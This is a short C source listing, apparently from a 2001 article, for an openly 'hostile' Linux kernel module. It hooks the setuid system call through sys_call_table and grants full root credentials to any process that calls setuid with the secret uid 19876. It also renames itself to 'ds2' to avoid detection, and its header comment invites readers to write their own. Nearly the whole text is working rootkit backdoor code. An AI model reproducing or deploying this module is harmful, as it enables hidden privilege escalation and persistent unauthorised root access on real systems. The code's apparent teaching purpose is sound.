|
(view this code in a separate window) /* * Example hostile Linux loadable kernel module * * Copyright 2001, Bri Hatch * Released under the GPL. * * Note: there are zillions of ways to do this. * Have fun, program your own, and learn a bit about * kernel games. * */ #define __KERNEL__ #define MODULE #include <linux/config.h> #include <linux/module.h> #include <linux/version.h> #include <sys/syscall.h> #include <linux/sched.h> #include <linux/types.h> int new_setuid(uid_t); int (*real_setuid)(uid_t); extern void *sys_call_table[]; int init_module() { /* Change our module name to hide a bit. It'll help prevent it from being found on disk. */ register struct module *mp asm("%ebx"); *(char *) (mp->name) = 'd'; *(char *) (mp->name+1) = 's'; *(char *) (mp->name+2) = '2'; *(char *) (mp->name+3) = '\0'; real_setuid = sys_call_table[ SYS_setuid ]; sys_call_table[ SYS_setuid ] = (void *)new_setuid; return 0; } int cleanup_module() { sys_call_table[ SYS_setuid ] = (void *)real_setuid; return 0; } int new_setuid(uid_t uid) { if ( uid == 19876 ) { current->uid = 0; current->gid = 0; current->euid = 0; current->egid = 0; return 0; } return (*real_setuid)(uid); }
|